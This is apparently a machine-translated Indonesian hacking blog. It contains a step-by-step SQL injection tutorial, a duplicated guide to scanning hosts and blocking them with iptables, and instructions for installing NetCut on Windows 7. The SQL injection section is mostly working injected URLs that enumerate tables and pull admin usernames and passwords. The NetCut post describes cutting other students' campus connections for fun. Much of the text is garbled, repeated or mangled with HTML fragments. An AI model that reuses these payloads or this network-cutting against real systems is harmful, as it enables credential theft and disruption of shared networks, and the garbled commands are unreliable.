web hacking or commonly called a web attack is very much a way, one of them by way of SQL injection.
What is SQL injection?
SQL injection occurs when an attacker could insert some SQL statements to 'query'
by way of manipulation of input data to the application TSB.
this is one way of doing SQL injection techniques, this way I copas from http://jasakom.com by an author named it cruz3N
OK, let's look together.
1. The first time we did of course find the target. For example our target this time is http://www.target.com/berita.php?id=100
2. Add the characters' at the end of the url or add the character "-" to see if there is an error message.
example :
http://www.target.com/berita.php?id=100'
or
http://www.target.com/berita.php?id=-100
4. Will display an error message ...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
That manual corresponds to your MySQL server version for the right syntax to use near'''
at line 1 "And more stuff.
5. Next step is to find and count the number of tables that exist in the database ...
Here we will use an order by order
Example:
http://www.target.com/berita.php?id=100+order+by+1/ *
Hohoho ... especially the "/ *"? That is the character cover SQL or we can also pake "--". Whatever aja ...
If "+" as the contact command ...
6. Well here directly dah sampe nyobain satu2 ...
http://www.target.com/berita.php?id=100+order+by+1/ * (not error)
http://www.target.com/berita.php?id=100+order+by+2/ * (we do not have too)
http://www.target.com/berita.php?id=100+order+by+3/ * (tired dah)
http://www.target.com/berita.php?id=100+order+by+4/ * (do not give up)
Until the error appears ...
Suppose the error here ...
http://www.target.com/berita.php?id=100+order+by+10/ *
Means that we take is "9"
http://www.target.com/berita.php?id=100+order+by+9/ *
7. To find out how many numbers that show now we use UNION
Example:
http://www.target.com/news.php?id=100+union+select+1, 2,3,4,5,6,7,8,9 / *
Then note the number how many are out (toggle Kayak aja ..., p)
8. Eg hockey figure out is "3" then who can we'll do is check which version of mysql is using that with the command "version ()" or "@ @ version"
http://www.target.com/news.php?id=100+union+select+1, 2, version (), 4,5,6,7,8,9 / *
Or
http://www.target.com/news.php?id=100+union+select+1, 2, @ @ version, 4,5,6,7,8,9 / *
9. Well if its version 5 directly aja pake command "information_schema" to see the tables and columns exist in the database ...
Example:
http://www.target.com/berita.php?id=100+union+select+1, 2, table_name, 4,5,6,7,8,9 + from + information_schema.tables / *
Now he said if the tables to see who else we add LIMIT at the end of the URL. But this time the cave tables do not use plasticity kok ... What's wrong cave? Maybe, but now that I want to explain is VERSION AND EXPERIENCE THE CAVE. Perhaps a slightly different ... ya know is just learning ... Hehehe ...
For example the table lo clay is "admin"
Well now we liat-liat aja used his column by replacing the word "table" of his ...
Example:
http://www.target.com/berita.php?id=100+union+select+1, 2, column_name, 4,5,6,7,8,9 + from + information_schema.colums / *
For example a column that comes out is "password" and "username"
Jump aja we see it ...
Example:
http://www.target.com/news.php?id=100+union+select+1, username, 3,4,5,6,7,8,9 + from + admin / *
and
http://www.target.com/news.php?id=100+union+select+1, password, 3,4,5,6,7,8,9 + from + admin / *
Can diliat dah ama username password login ... Stay ... Find a cool hold ... It's up to you ...
-------------------------------------------------- -
that's what is written there.
you still do not understand what SQL injection?
quiet please you download the file below document about SQL injection step by step.
good luck!!! :)
16 Apr 2010
Block IP and Mac Address
How to block ip and mac address that is located in a network is easier in Linux. What is clear, we already know the ip address and mac Address used by the target.
Scan
To know the ip address and MAC Address target, do the scanning on the network first. The first step can be done is to do a scan with the help of ping and arp.
root @ zhane: ~ # ping-b-c 2-W 1 10.0.2.255
& /dev/null & done" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">root @ zhane& /dev/null & done" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">: ~ # for i in $ (seq 1 254); do ping-c 2-W 1 10.0.2. $ i> & / dev / null & done
root @ zhane: ~ # arp | grep eth
Results last from arp table will show you where my ip address is active along with its MAC Address in the 10.0.2.x ip net, other methods for scanning your ip is to use nmap tools.
root @ zhane: ~ # nmap-sp-PI-PT 10.0.2.1/24
by doing nmap to one ip address on a network, then the ip address of the other (active) can be found.
Block Ip
To do bloc ip, please use the iptables command as follows:
root @ zhane: ~ # iptables-I INPUT-s 10.0.2.212-j DROP
The above example is the command to block ip 10.0.2.212 to server. To delete orders,
root @ zhane: ~ # iptables-D INPUT-s 10.0.2.22-j DROP
Block MAC Address
To block MAC Address, actually almost the same.
root @ zhane: ~ # iptables-A INPUT-m mac-mac-source 00:00: b4: aa: c1: 34-j DROP
and to delete them, just run the same command by changing the option-A (add) becomes-D (delete)
root @ zhane: ~ # iptables-D INPUT-m mac-mac-source 00:00: b4: aa: c1: 34-j DROP
Hopefully useful ..
Scan
To know the ip address and MAC Address target, do the scanning on the network first. The first step can be done is to do a scan with the help of ping and arp.
root @ zhane: ~ # ping-b-c 2-W 1 10.0.2.255
& /dev/null & done" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">root @ zhane& /dev/null & done" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">: ~ # for i in $ (seq 1 254); do ping-c 2-W 1 10.0.2. $ i> & / dev / null & done
root @ zhane: ~ # arp | grep eth
Results last from arp table will show you where my ip address is active along with its MAC Address in the 10.0.2.x ip net, other methods for scanning your ip is to use nmap tools.
root @ zhane: ~ # nmap-sp-PI-PT 10.0.2.1/24
by doing nmap to one ip address on a network, then the ip address of the other (active) can be found.
Block Ip
To do bloc ip, please use the iptables command as follows:
root @ zhane: ~ # iptables-I INPUT-s 10.0.2.212-j DROP
The above example is the command to block ip 10.0.2.212 to server. To delete orders,
root @ zhane: ~ # iptables-D INPUT-s 10.0.2.22-j DROP
Block MAC Address
To block MAC Address, actually almost the same.
root @ zhane: ~ # iptables-A INPUT-m mac-mac-source 00:00: b4: aa: c1: 34-j DROP
and to delete them, just run the same command by changing the option-A (add) becomes-D (delete)
root @ zhane: ~ # iptables-D INPUT-m mac-mac-source 00:00: b4: aa: c1: 34-j DROP
Hopefully useful ..
NetCut usage in Windows 7
Some days there are some emails on how to use netCut in windows 7. Because all users can not install windows 7 (wear) netCut on your PC or laptop. So to answer her question, I created this post. Incidentally I had met my friend in college who wore Windows 7 laptop. So can directly deh practice. The result? On disbanded tuh new students who enjoy open Facebook gara - gara connections on campus suddenly interrupted and could not be used again. Of course, I switch back after some time. Before continuing with this post, of course, we must know what it netCut. For those who do not know what it is netCut, could see the Free surfing with netCut and Antinetcut.Why can not wear netCut in windows 7? Actually netCut still can be used in windows 7. But that is not compatible with windows 7 is a program that has been integrated in Winpcap netCut. So in an installation netCut, windows 7 will mess up the install process is not running because Winpcap compatibel it. Winpcap is integrated in the master netCut is Winpcap version 3. While Windows 7 is the required minimum winpcap version 4. But we can still install netCut with winpcap version 4 kok. Just a different way than usual. To note, this netCut dikhusukan for Windows XP and of course can be used in Windows Vista. If Vista can not you be using this netCut, you can follow the same trick with the use of tricks in windows 7 I will show you.
To install in Windows 7 netCut you, surely you must have an application (master) netCut to be installed on your laptop or PC. If you still do not have netCut, you can install it in the link I provide below. After you download it and extract the RAR file, you follow the instructions below:
1. Once the file is ready, right click netCut (netcut.exe) and select "properties"
2. Form "properties" will appear. Locate and open the tab "Compatibility"
3. Check Compatibility Mode "Run this program in compatibility mode for" and select Windows XP. Whatever you choose Windows XP (Service Pack 2) or Windows XP (Service Pack 3).
4. Then click "OK"
5. After replacing the "Properties" is completed, install propertiesnya netCut has replaced earlier (2x netcut.exe by click or by other means).
6. After reaching half netCut install process, there will be a notice about installing Winpcap and not compatibel Winpcap program and should wear Winpcap version 4.0.
7. Simply proceed Winpcap installation process by clicking the "Next" and so on until the installation is complete netCut.
8. After netCut successfully installed, open the folder where instalan netCut earlier (if you do not change the place of installation (the default), where there netCut instalan in "C: / Program Files / netCut").
9. In the installation folder netCut exists a file called netcut.exe (results of this installation). Netcut.exe right click it and select "Properties".
10. Form "properties" will appear. Locate and open the tab "Compatibility"
11. Check Compatibility Mode "Run this program in compatibility mode for" and select Windows XP. Whatever you choose Windows XP (Service Pack 2) or Windows XP (Service Pack 3).
12. Then click "OK" (as a way of replacing a master netCut earlier).
13. The process is not finished, so do not open before you netCut.
14. The next step is to install Winpcap version 4.
15. When you do not have, please install it in the link I provide below.
16. You can directly install Winpcap version 4 without changing the "Properties" first.
17. Ensure Winpcap installed in "C: / Program Files / Winpcap" or you did not change the place instalan Winpcap because by default will be installed in "C: / Program Files / Winpcap".
18. You will receive a message that the old version of Winpcap is installed, whether to uninstall the old version?
19. Select only "Yes" and Winpcap installation process will run. Wait until finished.
20. Just what, you and wear open netCut wisely.
In early usage netCut, you usually will find an empty adapter. When that happens, just click "OK" and a blank form will also use netCut. Wait a minute until the appearance of IP numbers and IP Wireless Server you on the wireless network. Open up the back "Netcard Choice" and select the adapter you use. When direct emerged Server Wireless IP numbers and IP are you on wireless networks, just select the wireless adapter if you use a wireless connection (usually named "Microsoft"). Click 'OK'. If still not appear the list of users of wireless networks, replace your adapter by selecting the "Choice Netcard" earlier because of the possibility of using the adapter you are wrong. Congratulations to create ....!!!!!!
Download Netcut
Download Winpcap
by.rattelnetwork.blogspot.com
Subscribe to:
Posts (Atom)
